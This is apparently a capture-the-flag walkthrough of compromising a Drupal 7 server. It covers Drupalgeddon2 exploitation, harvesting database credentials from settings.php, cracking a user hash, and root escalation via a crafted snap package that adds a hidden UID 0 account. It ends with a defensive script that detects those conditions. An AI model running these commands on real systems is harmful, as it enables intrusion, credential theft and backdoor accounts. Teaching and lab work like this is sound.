nmap -p- -sS -sV

22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)

Port 80 hosts a web server which is visually identifiable as a Drupal instance.

Standard enumeration did not show any interesting information. From here drupwn was utilized to identify the exact version of Drupal installed.



git clone
cd drupwn
python3 install


drupwn --mode enum --target  

Searchsploit shows that this version of Drupal is vulnerable to "Drupalgeddon".

searchsploit -w "drupal 7.56"

Metasploit has a module for drupalgeddon2. Once the correct options were set, the exploit was executed.

We receive a meterpreter shell.

Now with a shell, we find we are working as the apache user. As Drupal is installed, we perform some basic enumeration steps to look for MySQL usernames and passwords. The command below can be used to scour the settings.php file for this information.

find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null

Having found the above credentials, we run a single command against MySQL to find a hash for a user on the machine.

mysql -u drupaluser --password='CQHEy@9M*m23gBVj' -e 'use drupal; select * from users'

This hash is then cracked with john to reveal the credentials: brucetherealadmin:boobo.

sudo john --wordlist=/usr/share/wordlists/rockyou.txt ~/Desktop/hash.txt   

We can now log in over SSH as the user brucetherealadmin.

From here was utilized to help with Privilege Escalation identification.

We find the current user can run the /usr/bin/snap binary as the root user without specifying a password.


From the above GTFOBins link we see that a malicious package can be crafted and installed so that it executes in the context of the root user.

The blog post linked below shows some ways in which this can be done.


We can also use the below Snap_Generator to help us easily craft the required snap packages.


Install fpm (Required)

sudo gem install fpm

Download and prepare Snap_Generator

wget && chmod +x

After running the above command, we then need to give the script a command to use in our package. In this instance we will add a new root user to the target system.

/usr/sbin/useradd -p $(openssl passwd -1 Password123) -u 0 -o -s /bin/bash -m owned

Upload the snap package to the target system.

sudo -u root /usr/bin/snap install /home/brucetherealadmin/owned_1.0_all.snap --dangerous --devmode

After completion, check for the existence of the new user.

Once confirmed, switch over to the new user.
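
The two host conditions this escalation depends on, a passwordless sudo rule for snap and the second UID 0 account it leaves behind, can be checked for from the defender's side. The script below is an added example, not part of the original write-up; the function names and the sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original write-up. Function names and the
# sample files below are constructed for illustration.

# Print accounts in a passwd-format file that have UID 0 but are not "root"
# (what `useradd -u 0 -o` leaves behind).
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print non-comment sudoers lines granting NOPASSWD on a binary named "snap".
nopasswd_snap_rules() {
    grep -v '^[[:space:]]*#' "$1" |
        grep -E 'NOPASSWD:.*[[:space:]/,:]snap([[:space:],]|$)' || true
}

# Constructed sample data mirroring the state described in the write-up.
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
brucetherealadmin:x:1000:1000::/home/brucetherealadmin:/bin/bash
owned:x:0:1001::/home/owned:/bin/bash
EOF
cat > "$SAMPLE_DIR/sudoers" <<'EOF'
# brucetherealadmin ALL=(root) NOPASSWD: /usr/bin/snap
root ALL=(ALL) ALL
brucetherealadmin ALL=(root) NOPASSWD: /usr/bin/snap install *
backup ALL=(root) NOPASSWD: /usr/bin/snapper list
EOF

echo "Extra UID 0 accounts:"; extra_uid0_accounts "$SAMPLE_DIR/passwd"
echo "NOPASSWD snap rules:";  nopasswd_snap_rules "$SAMPLE_DIR/sudoers"
```

On a live host, point the first function at /etc/passwd and feed the second a file holding the output of `sudo -l -U <user>` or the contents of /etc/sudoers and /etc/sudoers.d/.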
